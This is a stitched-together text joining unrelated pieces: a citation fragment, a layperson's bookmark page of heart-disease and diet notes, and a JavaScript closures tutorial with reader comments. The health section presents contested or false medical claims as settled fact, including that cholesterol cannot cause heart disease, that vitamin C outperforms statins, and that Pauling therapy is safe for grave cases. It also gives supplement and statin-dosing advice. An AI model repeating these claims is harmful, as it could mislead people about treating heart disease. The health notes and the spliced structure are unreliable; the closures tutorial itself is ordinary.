Kurdistan University of Medical Sciences}, doi = {10.22102/20.5.41}, year = {2015} }
Irregular Heartbeat - Causes & Treatments Read more Resveratrol - Why Red Wine Extends Life - French Paradox Resveratrol - 60 Minutes recently ran a piece about Resveratrol, a compound produced by certain plants (like red wine grapes) when they are under attack by bacteria or fungi. Some think resveratrol is the explanation for the French paradox, the observation that the French have a low incidence of heart disease, despite a diet rich in saturated fats. To explain the paradox, some researchers pointed to the relatively high red wine consumption of the French. As red wine studies progressed, researchers isolated a compound in grape skin called resveratrol. Read more Cholesterol Levels NOT Highly Correlated with Heart Disease Cholesterol levels not highly correlated with heart disease - Recent study indicates that the two most commonly used risk algorithms (based primarily on blood cholesterol levels) correlate poorly with heart disease. Lead author Dr. Kevin M. Johnson says the risk profiles based on Framingham score or the National Cholesterol Education Program (NCEP) Adult Treatment Panel III (ATP III) are "weak discriminator of the overall atherosclerotic plaque burden and may lead to over- or undertreatment of patients." Johnson points out that the Framingham risk estimate is derived from epidemiologic observations. As other studies have shown, Framingham predicts the risk of a coronary event only 60% to 65% of the time. "When you turn around and you try to use that kind of epidemiological data to make a clinical decision in the doctor's office, it falls apart....[T]here will be a lot of people who have a low Framingham risk who have a lot of atherosclerotic plaque, and a lot of people with high risk, by Framingham score, with no plaque," Read more Cholesterol - Bookmarks Read more Unified Theory of Heart Disease - by Linus Pauling The story of coronary artery disease (CAD) begins with where artery blockages occur and where they don't. Typically, blockages occur in the coronary arteries on the outer surface of the heart. However, blockages are not often found in arteries or veins in any other part of the body (though carotid blockages are becoming more common). Furthermore, the CAD blockages do not naturally occur in other species. What's different about the coronary arteries of the human species that make them vulnerable to heart disease? To explain the difference, Linus Pauling posited a theory, his Unified Theory of Heart Disease. Pauling observed that the CAD blockages occur in areas of high mechanical stress. Due to their location, these arteries are subject to continuous squeezing, pulling, and tugging from the ceaseless contractions of the heart. Like a garden hose that's repeatedly compressed or squeezed, this mechanical stress has the potential for causing damage. Normally, the body quickly repairs that damage, and in most other mammals (those that do not naturally suffer from CAD), the repair is seamless. In humans, however, the repeated repair process leads to CAD. Why? Read more Plavix (Clopidogrel) - Side Effects - Research Read more Effects of Carbs and Sugars on Heart Disease - Research Review Read more Nutola From comments on post from Diet Blog. Based on the nutola in Rosedale book. I don't bother to roast the nuts - too much work. Just put a few pecans, pine nuts, cashews, almonds, and blueberries in a small bowl and sprinkle with about a teaspoon of cinnamon. Then I pour just a little heavy cream over the mixture. It is a great breakfast or snack. I use the heavy cream because it contains fewer milk proteins, just fat, which is what we are after on this diet. The cinnamon is for taste and improving blood sugar levels - I think it has a chemical that makes cells more responsive to insulin. This has been proven and I believe cinammon is recommended to diabetics now. Read more Ron Rosedale, M.D. - Metabolic Effects of Insulin Found this transcript of Ron Rosedale talk on the metabolic effects of insulin. Totally blew me away. Note that it's a talk, and the transcript is filled with typos, but the essence sounds right on. I've copied the transcript here because the site that's hosting the content doesn't look particularly stable, and I don't want to lose the info. Read more Maya Kaimal Indian Coconut Curry - with Broccoli & Cauliflower Maya Kaimal Indian Coconut Curry is awesome! Just cook up some chicken, steamed broccoli and cauliflower, and mix everthing sauce and simmer--super! And very low carbs, though technically Rosedale isn't a fan of coconut oil (contained in sauce). I'm not so picky. Read more Rosedale Diet - Recipes I like the focus and philosophy of Rosedale. He's VERY knowledgeable and has the science down. I'm not quite there in terms of adopting his approach, but in time. Right now a focus on avoiding processed foods and eating whole foods (eggs, whole meats, fruits, veggies, even milk) has worked well for me. Below are a couple Rosedale recipes I like. Read more Rosedale Diet - High Fat, Moderate Protein, Minimal Carb Eating Plan "" | Rosedale Diet was created by Ron Rosedale, and M.D. centered in Denver, Colorado. Ron Rosedale, M.D. - Metabolic Effects of Insulin. I like the principles of this diet, and I think it's a healthy one to follow. However, I find myself favoring The Fat Resistance Diet by Leo Galland. The Fat Resistance Diet contains some wonderful recipes, though it does permit (even encourage) more carbs like fruit. Even so, I find I'm still losing weight and feeling quite good on the Fat Resistance Diet. Rosedale is a lot more disciplined about carbs, striving for a continuous ketosis state. Read more Cholesterol Myth - Evidence Refuting Cholesterol Causes Heart Disease Cholesterol Myth / Heart Disease Myth - I've become suspicious of the current model that high blood cholesterol (particularly LDL) is directly related to coronary heart disease risk (CHD). Operating from this belief, doctors prescribe drugs which reduce blood LDL levels thinking this effect also reduces the heart disease risk (CHD). Specifically, I'm referring to the widespread acceptance of statin drugs (Crestor, Zocor, Lipitor, etc.). Statins clearly reduce LDL, but they carry with them other effects that may be more relevant to reducing CHD risk than reducing LDL levels. It's like trying to stop aging by stopping hair from turning gray. Gray hair is a symptom of aging, but not necessarily part of the cause. Similarly, LDL may be a symptom of CHD risk, but NOT likely a cause. However, as I make clear below, I don't think high LDL is necessarily a symptom of high CHD risk. Work in progress. I hope to have study citations to support each assertion listed below in what I hope will be a more comprehensive model of coronary heart disease (CHD). Read more Why the Low Fat Diet Is Stupid and Potentially Dangerous - Anthony Colpo This article by Anthony Colpo contains only part of his critical (scathing) review of research into low-fat diets and the goal of low cholesterol for reducing heart disease risk. Read more Statin Dangers - Control Cholesterol Read more Stroke of Insight - Jill Bolte Taylor at TED - Video & Transcript Stroke of Insight - Jill Bolte Taylor - One of the most profound presentations I have ever experienced....WATCH THIS! (:tedvideo JILLTAYLOR-2008-2:) Read more Get the Most From Your Statin Get the Most from Your Statin - Everyday Health reports that when and how you take your statin can influence its effectiveness and absorption. • Mevacor - Take with food. This almost doubles the amount of medication absorbed into bloodstream. • Mevacor, Pravachol, Zocor, Lescol - Take with your evening meal. These statins block a one of the liver's key cholesterol-making enzymes, and that enzyme is most active at night. • Crestor, Lipitor - Take at any time, as these statins stay in the body and bloodstream long enough that you can take them any time. • Pravachol - If on other medications, try Pravachol, which is less likely to interact with other medications than other statins. Read more South Beach Heart Health Revolution - by Agatston - Notes Calcium score - Also called Agatston score, measures the amount of calcified plaque inside the coronary arteries. Higher the calcium score, the higher the chance of heart attack. Excellent predictor of future heart attack risk. Computed tomography (CT) or electron beam tomography (EBT) - used for imaging heart. Scans provide a calcium score? Atherosclerosis - When artery walls gradually filled with plaque (cholesterol, inflammatory cells, scar tissue). Different kinds of plaque. Heart attack caused when soft cholesterol rich plaque bursts, resulting in blood clot. Blood clot blocks blood flow to heart. News to me. I thought plaque, not a blood clot, that caused artery blockage and heart attack. But this clot model makes sense, given sudden nature of heart attack. A slowly developing plaque blockage should give the heart time to grow collateral vessels. Better model of heart attack - Heart attack not caused by plaque blockage in the tube of the vessel (old school). The culprit is plaque depositing in the inner lining of vessel walls, like pimple filled with cholesterol. When pimples bursts, an injury site is created. To heal the injury, a clot will form. If the clot is big enough, it blocks the artery, causing heart attack. Read more Open-Heart Surgery Recovery - Research "" | Dropping Hemoglobin - Anemia Anemia (low hemoglobin) can be caused by many things, but the three main bodily mechanisms that produce it are: excessive destruction of RBCs, blood loss, inadequate production of RBCs. Read more Reversing Heart Disease In progress 1. Atherosclerotic plaques deposit in response to injury 2. Mechanical stress causes heart disease in vitamin-C-starved tissues 3. In 1989 it was discovered that Lp(a) binds to form plaque, not LDL 4. Ordinary cholesterol cannot and does not cause heart disease 5. Ten-year experience shows Pauling Therapy is effective, and safe as long as vitamin C is increased. 6. Pauling's therapy is so safe, and the medical condition so grave, there is no plausible reason for any physician resisting it, especially in otherwise hopeless cases 7. Vitamin C Lowers (LDL) Cholesterol More than Statin Drugs 8. Artifical statin drugs increase Lp(a) and lower CoQ10 causing myopathies 9. Nearly 60 million Americans are diagnosed with Cardiovascular disease 10. Retinal photos confirm chronic scurvy, reversals and Pauling/Rath theory 11. Pharmacology experts cite numerous errors in vitamin C RDA research 12. Bizzaro World: No published clinical studies!? Read more Coenzyme Q10 - Research | Coenzyme Q10 Ubiquinone, or coenzyme Q10, is an important nutrient. 2 of its primary uses are for those who are taking high cholesterol pills (the statin drugs in particular). Certain lipid-lowering drugs, such as the 'statins' - lovastatin, simvastatin, pravastatin - and gemfibrozil as well as oral agents which lower blood sugar, such as tolazamide and glyburide, cause a decrease in serum levels of coenzyme Q10 and reduce the effects of coenzyme Q10 supplementation (7,8). These drugs inhibit the production of coenzyme Q10 by the liver and will cause serious complications unless one supplements coenzyme Q10 back into the diet. A prescription for lipid-lowering statin drugs should always be accompanied with a recommendation to take coenzyme Q10, because if a person is deficient in coenzyme Q10, heart failure is more likely. Coenzyme Q10 - Share The Wealth CoQ10 is an essential component in the membranes and mitochondria, the "lungs" or "power plants" of the cell[ii]. It is intimately involved in synthesis of adenosine triphosphate (ATP), the basic respiratory energy molecule in the mitochondria of every cell, and so in generation of 95 percent of the body's energy. It helps the body's cells convert food and oxygen into ATP, a chemical that all tissues require to function properly. There are several thousand mitochondria in each cell. Read more How to Best Absorb Coenzyme Q10 Coenzyme Q10 (CoQ), also known as ubiquinone, is a natural, fat-soluble antioxidant produced in the body. Some reports claim that statins (Crestor, Lipitor, etc.) interfere with the liver's natural production of Coenzyme Q10, reducing quantities by up to 40 percent. As a result, some suggest statin users take supplements of Coenzyme Q10, but warn that absorption varies. Here's some help I found on eHow for how to best Absorb Coenzyme Q10. Read more Vitamin C and Heart Disease Read more Robert Kowalski - Heart Healthy Supplement Regimen Found this in Robert Kowalski's website. Lists in detail the cholesterol fighter's current regimen of vitamin, mineral, and other supplements. Read more Leading Cause of Death in US ... Medical Treatment! Death by Medicine - According to a review study, more deaths are caused annually in the U.S. by medical treatment and diagnostic procedures than by heart disease or cancer. WTF! ConditionDeathsCostAuthor Adverse Drug Reactions106,000$12 billionLazarou(1), Suh (49) Medical error98,000$2 billionIOM(6) Bedsores115,000$55 billionXakellis(7), Barczak (8) Infection88,000$5 billionWeinstein(9), MMWR (10) Malnutrition108,800-----------Nurses Coalition(11) Outpatients199,000$77 billionStarfield(12), Weingart(112) Unnecessary Procedures37,136$122 billionHCUP(3,13) Surgery-Related32,000$9 billionAHRQ(85) ANNUAL TOTAL783,936$282 billion       Heart Disease699,697   Cancer553,251   And these numbers are based on reported deaths, which suggests the true death toll from medical treatment is much higher. Is American Medicine Working? Here is the reviewers' reply... Read more Post Heart Attack Treatments Cause Heart Muscle Death "The new science of resuscitation is changing the way doctors think about heart attacks—and death itself." "In an emergency department, you work like mad for half an hour on someone whose heart stopped, and finally someone says, 'I don't think we're going to get this guy back,' and then you just stop--The body on the cart is dead, but its trillions of cells are all still alive." Assumption: After a heart attack, the heart stops beating and heart muscle cells start dying. Wrong. The heart cells live for hours after someone is pronounced dead. What kills heart cells immediately is a profusion of oxygen. When high levels of oxygen are introduced into oxygen starved (not dead) heart cells, the cell basically commit suicide. Very strange. For some reason the high concentration of oxygen triggers a suicide response in the cells. Read more Dean Ornish Warns - Omega-3 Fats Could Kill You! Dean Ornish Dean Ornish Says Omega-3 Fats Could Kill You!! - Yes, you read that right. Recent studies by Dr. Alexander Leaf of Harvard Medical School and others confirm many benefits to Omega-3 fatty acids for most people. However, for a sub-population who have had a heart attack or have congestive heart failure, consuming Omega-3 fats could kill them. Why? When heart muscle cells are starved for oxygen (as during heart attack or congestive heart failure), those heart cells become "hyper-excitable." Hyper-excitable cells activate or contract with less stimulus than healthy cells. This increased sensitivity is probably what keeps the weakened cells constricting at all. However, omega-3 fatty acids are "effectively removing these hyper-excitable cells from functioning." And if a significant proportion of the cells pumping your heart are hyper-excitable cells, omega-3 fatty acids could seriously reduce your heart's ability to pump, and in some cases that can cause a lethal heart attack. Read more Drug-eluting Stents - Bookmarks Read more Drug-Eluting Stents - What Causes Thrombosis? Excellent article that describes recent studies on drug-eluting stents, including autopsy results. In a nutshell: Drug-eluting stents increase risk of coronary artery thrombosis (clot). Drug-eluting stents reduce collateral vessel growth (vascularization). Vessel growth helps the heart handle the loss of blood flow if a clot occurs in the stent site in the coronary artery. So patients with drug-eluting stents not only are more likely to develop a clot, but for that clot to cause more damage due to reduced vascularization in the area of the clot. Doctors suggest Plavix and aspirin treatment for at least a year to prevent thrombosis (clots). Read more Drug-eluting Stents Read more Drug-eluting Stents Reduce Collateral Blood Vessel Growth Drug-eluting Stents Reduce Collateral Vessel Growth - New study indicates that drug-eluting stents may obstruct the heart's natural ability to form small collateral blood vessels - nature's bypass mechanism. For patients with coronary artery blockages, these vessels normally help supply blood to areas starved by artery blockages. The drug-eluting stents appear to hinder this natural, healing process. Read more Drug-eluting Coronary Artery Stents Increase Clot Risk Drug-eluting stents seem to prevent arterial lining from forming over stent. So when patients stop Plavix, clots form (due to exposed metal in artery lining from stent?). One man, as prescribed by his doctor, stopped Plavix after one year and collapsed from a clot. I wonder: When the drug is gone from the drug-eluting stent (after 6 months?), will the artery lining form properly? Did not appear to do so with that 41 year-old man. If not, is Plavix is safe to take for long-term? Scientists speculate that the problems arise when these drug-eluting stents are used incorrectly, in vessels that are too narrow or where blockages too extensive. Read more 99 Ways To Keep Your Heart Pumping Wonderful list of tips for preventing heart disease and strokes (most seem research-based). Below are a few of my favorites from the list of 99 heart healthy tips. 6. Grill a steak. You may think it’s bad for your heart, but you’d be wrong. Beef contains immunity-boosting selenium as well as homocysteine-lowering B vitamins. And up to 50 percent of the fat is the heart-healthy monounsaturated variety. 14. Swap honey for sugar. Researchers at the University of Illinois found that honey has powerful antioxidant qualities that help combat cardiovascular disease, while sugar consumption can lower your levels of HDL cholesterol, potentially increasing your risk of heart-related disorders. 77. Have more sex. You might think all that grunting and sweating would increase your risk of a stroke, but University of Bristol researchers say the opposite is actually true. Not only are men who have sex at least twice a week less likely to have a stroke than men who have sex less often, but all that steamy exercise may also help reduce their heart-disease risk by up to a third, compared with guys who aren’t getting any. 98. Add E to aspirin. Researchers at the University of Pennsylvania found that a combination of the antioxidant (shoot for 800 international units) and blood-thinner helped reduce levels of plaque in clogged arteries by more than 80 percent. Read more Even One Fatty Meal Affects Arteries Just one meal of saturated fat can inflame the inner lining (endothelium) of blood vessels. This reduces the vessels' ability to expand and increase blood flow. Further, the inflammation can lead to lesions or cracks between the cells in the vessel lining, which are repaired by the body using cholesterol (oversimplification). When bad cholesterol (LDL) is used for the repair, plaque buildup and arteriosclerosis can result. When good cholesterol (HDL) is used for the repair, plaque buildup is less likely. Just one meal of high saturated fats can reduce good cholesterol (HDL) levels. Conversely, one meal of unsaturated fats can increase good cholesterol (HDL) levels. Read more Worst Breakfast Ever Take a gander at the total fat, saturated fat, sodium, and cholesterol content in this mother of a breakfast from Swanson. It's called the Hungry Man All Day Breakfast--sure to give you arteriosclerosis. I'll take two. Swanson Hungry Man All Day Breakfast Worst Breakfast Ever Read more
How do JavaScript closures work under the hood You're reading the original article in English. You can as well read the translations: If you have translated the article to different language, please leave a comment or write me an email, so that I can update the list. Thank you. I've been using closures for quite some time already. I learned how to use them, but I didn't have clear understanding of how closures actually work, and what's going on behind the scenes when I use them. What the closure is exactly, to begin with? Wikipedia doesn't help very much. When it is created and deleted? What the implementation should look like? "use strict";   var myClosure = (function outerFunction() {   var hidden = 1;   return { inc: function innerFunction() { return hidden++; } };   }());   myClosure.inc(); // returns 1 myClosure.inc(); // returns 2 myClosure.inc(); // returns 3   // Ok, very nice. But how is it implemented, // and what's going on behind the scenes? And when I eventually got it, I felt excited and decided to explain it: at least, I will definitely not forget it now. You know, Tell me and I forget. Teach me and I remember. Involve me and I learn. © Benjamin Franklin And, after all, while I was reading existing explanations of closures, I tried hard to imagine visually how things relate to each other: which object references others, which one inherits from another, etc. I failed to find such useful illustrations, so, I decided to draw my own. I assume that the reader is already familiar with JavaScript, knows what is a Global Object, knows that functions in JavaScript are “first-class objects”, etc. Scope chain When any JavaScript code is executing, it needs some place to store its local variables. Let's call this place as a scope object (some refer to it as a LexicalEnvironment). For example, when you invoke some function, and function defines local variables, these variables are saved on the scope object. You can think of it as a regular JavaScript object, with the notable difference that you can't refer to the whole object directly. You can only modify its properties, but you can't refer to the scope object itself. This concept of scope object is very different from, say, C or C++, where local variables are stored on stack. In JavaScript, scope objects are allocated in heap instead (or at least they behave like this), so they might stay allocated even if function already returned. More on that later. As you might expect, scope object might have parent. When the code tries to access some variable, interpreter looks for the property of current scope object. If the property doesn't exist, interpreter moves to the parent scope object, and looks there. And so on, until the value is found, or there's no more parent. Let's call this sequence of scope objects as a scope chain. The behavior of resolving a variable on scope chain is very similar to that of prototypal inheritance, with, again, one notable difference: if you try to access some non-existing property of regular object, and prototype chain doesn't contain this property either, it's not an error: undefined is silently returned. But if you try to access non-existing property on the scope chain (i.e. access non-existing variable), then ReferenceError occurs. The last element in the scope chain is always the Global Object. In top-level JavaScript code, scope chain contains just a single element: the Global Object. So, when you define some variables in top-level code, they are defined on Global Object. When some function is invoked, scope chain consists of more than one object. You might expect that if function is called from top-level code, then scope chain is guaranteed to contain exactly 2 scope objects, but this is not necessarily true! There might be 2 or more scope objects; it depends on the function. More on that later. Top-level code Ok, enough theory, let's try something concrete. Here is a very simple example: my_script.js "use strict";   var foo = 1; var bar = 2; We just create two variables in top-level code. As I mentioned above, for top-level code, scope object is a Global Object: In the diagram above, we have execution context (which is just top-level my_script.js code), and the scope object referenced by it. Of course, in real world, Global Object contains lots of standard- and host-specific stuff, but it's not reflected in the diagrams. Non-nested functions Now, consider this script: my_script.js "use strict"; var foo = 1; var bar = 2;   function myFunc() { //-- define local-to-function variables var a = 1; var b = 2; var foo = 3;   console.log("inside myFunc"); }   console.log("outside");   //-- and then, call it: myFunc(); When the function myFunc is defined, myFunc identifier is added to the current scope object (in this case, Global object), and this identifier refers to the function object. The function object holds function's code as well as other properties. One of the properties that we're interested in is an internal property [[scope]]; it refers to the current scope object, that is, the scope object that was active when the function is defined (again, in this case, Global object). So, by the time the console.log(“outside”); is executed, we have the following arrangement: Again, take a moment to reflect on it: the function object referred by myFunc variable not only holds the function code, but also refers to the scope object which was in effect when the function is defined. This is very important. And when the function is invoked, new scope object is created, which keeps local variables for myFunc (as well as its argument values), and this new scope object inherits from the scope object referenced by the function being invoked. So, when myFunc is actually invoked, the arrangement becomes as follows: What we have now is a scope chain: if we try to access some variable inside myFunc, JavaScript will try to find it on the first scope object: myFunc() scope. If the lookup fails, then go to the next scope object in the chain (here, it's Global object), and look there. If requested property is not a part of all scope objects in the chain, then ReferenceError occurs. For example, if we access a from myFunc, we get value 1 from the first scope object myFunc() scope. If we access foo, we get value 3 from the same myFunc() scope: it effectively hides the foo property of the Global object. If we access bar, we get value 2 from Global object. It works pretty much like prototypal inheritance. It's important to note that these scope objects are persisted as long as there are references to them. When the last reference to some particular scope object is dropped, this scope object will be garbage-collected on occasion. So, when myFunc() returns, nobody references myFunc() scope anymore, it gets garbage-collected, and we end up with previous arrangement again: From now on, I won't include explicit function objects in the diagrams, since diagrams become too overloaded otherwise. You already know: any reference to a function in JavaScript refers to function object, which, in turn, has a reference to the scope object. Always keep this in mind. Nested functions As we've seen from the previous discussion, when function returns, nobody else references its scope object, and so, it gets garbage-collected. But what if we define nested function and return it (or store somewhere outside)? You already know: function object always refers to the scope object in which it was created. So, when we define nested function, it gets reference to the current scope object of outer function. And if we store that nested function somewhere outside, then the scope object won't be garbage collected even after outer function returns: there are still references to it! Consider this code: my_script.js "use strict";   function createCounter(initial) { //-- define local-to-function variables var counter = initial;   //-- define nested functions. Each of them will have // a reference to the current scope object   /** * Increments internal counter by given value. * If given value is not a finite number or is less than 1, then 1 is used. */ function increment(value) { if (!isFinite(value) || value < 1){ value = 1; } counter += value; }   /** * Returns current counter value. */ function get() { return counter; }     //-- return object containing references // to nested functions return { increment: increment, get: get }; }   //-- create counter object var myCounter = createCounter(100);   console.log(myCounter.get()); //-- prints "100"   myCounter.increment(5); console.log(myCounter.get()); //-- prints "105" When we call createCounter(100);, we have the following arrangement: Notice that createCounter(100) scope is referenced by nested functions increment and get. If createCounter() returned nothing, then, of course, these inner self-references wouldn't be counted, and the scope would be garbage-collected anyway. But since createCounter() returns object containing references to these functions, we have the following: Take some time to reflect on it: the function createCounter(100) already returned, but its scope is still there, accessible by the inner functions, and only by these functions. It is truly impossible to access createCounter(100) scope object directly, we can only call myCounter.increment() or myCounter.get(). These functions have unique private access to the scope of createCounter. Let's try to call, for example, myCounter.get(). Recall that when any function is called, new scope object is created, and scope chain that is referenced by the function is augmented with this new scope object. So, when myCounter.get() is called, what we have is: The first scope object in the chain for function get() is the empty object get() scope. So, when get() accesses counter variable, JavaScript fails to find it on the first object in the scope chain, moves to the next scope object, and uses counter variable on createCounter(100) scope. And get() function just returns it. You may have noticed that myCounter object is additionally given to the function myCounter.get() as this (denoted by red arrow on the diagram). This is because this is never a part of the scope chain, and you should be aware of it. More on that later. Calling increment(5) is a bit more interesting, since this function has an argument: As you see, the argument value is stored in the scope object that was created just for a single call increment(5). When this function accesses variable value, JavaScript immediately locates it on the first object in the scope chain. When, however, the function accesses counter, JavaScript fails to find it on the first object in the scope chain, moves to the next scope object, and locates it there. So, increment() modifies the counter variable on createCounter(100) scope. And virtually nobody else can modify this variable. This is why closures are so powerful: the myCounter object is impossible to compromise. Closures are very appropriate place to store private things. Notice that the argument initial is also stored in the scope object of createCounter(), even though it is not used. So, we can save a bit of memory if we get rid of explicit var counter = initial;, rename initial to counter, and use it directly. But, for clarity, we have explicit argument initial and var counter. It is important to highlight that bound scopes are “live”. When function is invoked, current scope chain is not copied for this function: the scope chain is just augmented with new scope object, and when any scope object in the chain is modified by any function, this change is immediately observable by all functions that have this scope object in their scope chains. When increment() modifies counter value, the next call to get() will return updated value. This is why this well-known example doesn't work: "use strict";   var elems = document.getElementsByClassName("myClass"), i;   for (i = 0; i < elems.length; i++) { elems[i].addEventListener("click", function () { this.innerHTML = i; }); } Multiple functions are created in the loop, and all of them have reference to the same scope object in their scope chains. So, they use exactly the same variable i, not private copies of it. For further explanation of this particular example, see this link: Don't make functions within a loop. Similar function objects, different scope objects Now, let's try to expand a bit our counter example and have more fun. What if we create more than one counter objects? It doesn't hurt: my_script.js "use strict";   function createCounter(initial) { /* ... see the code from previous example ... */ }   //-- create counter objects var myCounter1 = createCounter(100); var myCounter2 = createCounter(200); When both myCounter1 and myCounter2 are created, we have the following: Be sure to remember that each function object has a reference to the scope object. So, in the example above, myCounter1.increment and myCounter2.increment refer to function objects that have exactly the same code and the same property values (name, length, and others), but their [[scope]] refer to different scope objects. Diagram does not contain separate function objects, for the sake of simplicity, but they are still there. Some examples: var a, b; a = myCounter1.get(); // a equals 100 b = myCounter2.get(); // b equals 200   myCounter1.increment(1); myCounter1.increment(2);   myCounter2.increment(5);   a = myCounter1.get(); // a equals 103 b = myCounter2.get(); // b equals 205 So, this is how it works. The concept of closures is very powerful. Scope chain and "this" Like it or not, this is not saved as a part of the scope chain at all. Instead, value of this depends on the function invocation pattern: that is, you may call the same function with different values given as this. Invocation patterns This topic pretty much deserves its own article, so I won't go deeply inside, but as a quick overview, there are four invocation patterns. Here we go: Method invocation pattern "use strict";   var myObj = { myProp: 100, myFunc: function myFunc() { return this.myProp; } }; myObj.myFunc(); //-- returned 100 If an invocation expression contains a refinement (a dot, or [subscript]), the function is invoked as a method. So, in the example above, this given to myFunc() is a reference to myObj. Function invocation pattern "use strict";   function myFunc() { return this; } myFunc(); //-- returns undefined When there's no refinement, then it depends on whether the code runs in strict mode: • in strict mode, this is undefined • in non-strict mode, this points to Global Object Since the code above runs in strict mode thanks to “use strict”;, myFunc() returns undefined. Constructor invocation pattern "use strict";   function MyObj() { this.a = 'a'; this.b = 'b'; } var myObj = new MyObj(); When function is called with new prefix, JavaScripts allocates new object which inherits from the function's prototype property, and this newly allocated object is given to the function as this. Apply invocation pattern "use strict";   function myFunc(myArg) { return this.myProp + " " + myArg; }   var result = myFunc.apply( { myProp: "prop" }, [ "arg" ] ); //-- result is "prop arg" We can pass arbitrary value as this. In the example above, we use Function.prototype.apply() for that. Beyond that, see also: In the examples that follow, we will primarily use Method invocation pattern. Usage of "this" in nested functions Consider: "use strict";   var myObj = {   myProp: "outer-value", createInnerObj: function createInnerObj() {   var hidden = "value-in-closure";   return { myProp: "inner-value", innerFunc: function innerFunc() { return "hidden: '" + hidden + "', myProp: '" + this.myProp + "'"; } };   } };   var myInnerObj = myObj.createInnerObj(); console.log( myInnerObj.innerFunc() ); Prints: hidden: 'value-in-closure', myProp: 'inner-value' By the time myObj.createInnerObj() is called, we have the following arrangement: And when we call myInnerObj.innerFunc(), it looks as follows: From the above, it's clear that this given to myObj.createInnerObj() points to myObj, but this given to myInnerObj.innerFunc() points to myInnerObj: both functions are called with Method invocation pattern, as explained above. That's why this.myProp inside innerFunc() evaluates to “inner-value”, not “outer-value”. So, we can easily trick innerFunc() into using different myProp, like this: /* ... see the definition of myObj above ... */   var myInnerObj = myObj.createInnerObj(); var fakeObject = { myProp: "fake-inner-value", innerFunc: myInnerObj.innerFunc }; console.log( fakeObject.innerFunc() ); Prints: hidden: 'value-in-closure', myProp: 'fake-inner-value' Or with apply() or call(): /* ... see the definition of myObj above ... */   var myInnerObj = myObj.createInnerObj(); console.log( myInnerObj.innerFunc.call( { myProp: "fake-inner-value-2", } ) ); Prints: hidden: 'value-in-closure', myProp: 'fake-inner-value-2' Sometimes, however, inner function actually needs access to this given to outer function, independently of the way inner function is invoked. There is a common idiom for that: we need to explicitly save needed value in the closure (that is, in the current scope object), like: var self = this;, and use self in inner function, instead of this. Consider: "use strict";   var myObj = {   myProp: "outer-value", createInnerObj: function createInnerObj() {   var self = this; var hidden = "value-in-closure";   return { myProp: "inner-value", innerFunc: function innerFunc() { return "hidden: '" + hidden + "', myProp: '" + self.myProp + "'"; } };   } };   var myInnerObj = myObj.createInnerObj(); console.log( myInnerObj.innerFunc() ); Prints: hidden: 'value-in-closure', myProp: 'outer-value' This way, we have the following: As you see, this time, innerFunc() has access to the value given as this to the outer function, through the self stored in the closure. Conclusion Let's answer a couple of questions from the beginning of the article: • What the closure is? - It is the object that refers both to function object and the scope object. Actually, all JavaScript functions are closures: it's impossible to have the reference to function object without scope object. • When is it created? - Since all JavaScript functions are closures, it's obvious: when you define a function, you actually define a closure. So, it is created when the function is defined. But make sure you distinguish between closure creation and new scope object creation: the closure (function + reference to the current scope chain) is created when the function is defined, but new scope object is created (and used to augment the closure's scope chain) when the function is invoked. • When is it deleted? - Just like any regular object in JavaScript, it is garbage-collected when there are no references to it. Further reading: • JavaScript: The Good Parts by Douglas Crockford. It's surely nice to understand how do closures work, but it's probably even more important to understand how to use them correctly. The book is very concise, and it contains lots of great and useful patterns. • JavaScript: The Definitive Guide by David Flanagan. As the title suggests, this book explains the language in a very detailed way. Discuss on reddit: or on Hacker News: Vote on HN Donate Discussion George, 2015/09/06 00:05 Thanks for the great article. Really helpful for me. A little question: what software do you use to draw these diagrams? Dmitry Frank, 2015/09/06 00:18 Glad it helped. As to diagram-drawing software, it's yEd. Not that I'm completely satisfied with it, but it's the best of what I've came up with. Take a look at PlantUML as well, I use it sometimes and I really like it for its text sources. (and if it had supported links to specific member of the object, not just to the whole object, I would've used PlantUML for this article as well) Andrew J Dittman, 2015/09/06 14:44 The best explanation of closures I've read. Thank you. Dmitry Frank, 2015/09/06 15:51 You're welcome, Andrew! Scott, 2015/09/06 16:11 Thanks for this post, it's very interesting. High Performance JavaScript by Nicholas C. Zakas has some great examples and illustrations in Chapter 2, have you checked those out? Dmitry Frank, 2015/09/06 16:17 Scott, I have this book on my to-read list, but haven't read it yet. So will probably get to it when I finish The Definitive Guide. Thanks for mentioning it! Patrick, 2015/09/06 17:00 Good article. It would be interesting to add examples if you take a function that has closure and use function.prototype.call() to provide a this and show that may change the scope chain. Dmitry Frank, 2015/09/06 22:00 Hi Patrick, thanks for your feedback. Regarding to Function.prototype.call(), it's a bit misleading to say that providing custom this will change the scope chain: actually, this is not saved as part of the scope chain at all. Thanks for the suggestion, this topic is definitely worth explaining, so, I've added new section in the article: Scope chain and "this". Priyank, 2015/09/06 19:14 Hey, Really good Article . But i have a question let's say the increment function inside has some locally defined variables so when we call myCounter.increment() then what is the scope of that variables after function execution will they be garbage collected ? Dmitry Frank, 2015/09/06 19:28 Hi Priyank, thanks for your feedback. When we call myCounter.increment(), we have the scope chain as in this diagram, just replace get with increment. So, if increment() has some local variables, like this: function increment() { var myLocalVar = 10; //-- local variable (though useless here) counter++; } Then, variable myLocalVar will be stored in the left scope (which is empty in the diagram). And yes, when increment() returns, the scope with myLocalVar will be garbage-collected. Note that particular implementations of JavaScript may optimize empty scopes away (as well as scopes which contain only unused variables), but the idea is still here. Dmitry Frank, 2015/09/07 03:51 Priyank, I've updated the article: now, for clarity, the function increment() takes an argument. So, the diagram now looks as follows, and you might want to re-read the section Nested functions. Thanks for your question, it helped me to understand what should be improved. Sharat M R, 2015/09/06 19:21 Thank you for such a great article on JS Closures. One clarification - Won't myCounter1.increment and myCounter2.increment refer to different function objects as the function increment is defined when createCounter is called? Dmitry Frank, 2015/09/06 19:41 Hello Sharat! Thank you very much for your comment. Although I did my best to re-check myself before publishing, I finally made a mistake. :( Yes, you're right; of course, the function objects, while having exactly the same code, will be two different objects. How could I miss that.. Thanks again, I will fix the article. Dillon de Voor, 2015/09/07 08:03 Loved reading this article, thanks! However this part confuses me: “the myFunc variable not only refers to the function object, but also to the scope object” How can a single reference references two objects? According to the specification (step 9) scope is stored on the function object itself, so this diagram makes more sense: +---------------+ +---------------+ |function object| | Global object |<----[[scope]] | |---------------+ | | | myFun = <func>--->| | +---------------+ +---------------+ What do you think? Dmitry Frank, 2015/09/07 08:31 Thank you very much for your valuable feedback! Well, my understanding was that there might be some intermediary object that references function object and scope object, but now it's obvious that I was wrong in that: of course, the function object itself references scope object. Thanks for pointing this out. Dillon de Voor, 2015/09/10 17:58 No problem, really great article! Got me thinking and digging in the spec. Also the difference between outer and inner scope kept me busy for a while. I believe the outer scope is the scope in which the function is defined (referenced as [[scope]]) and the inner scope is a new scope created every time the function is called (meaning there can be many inner scopes). Ian 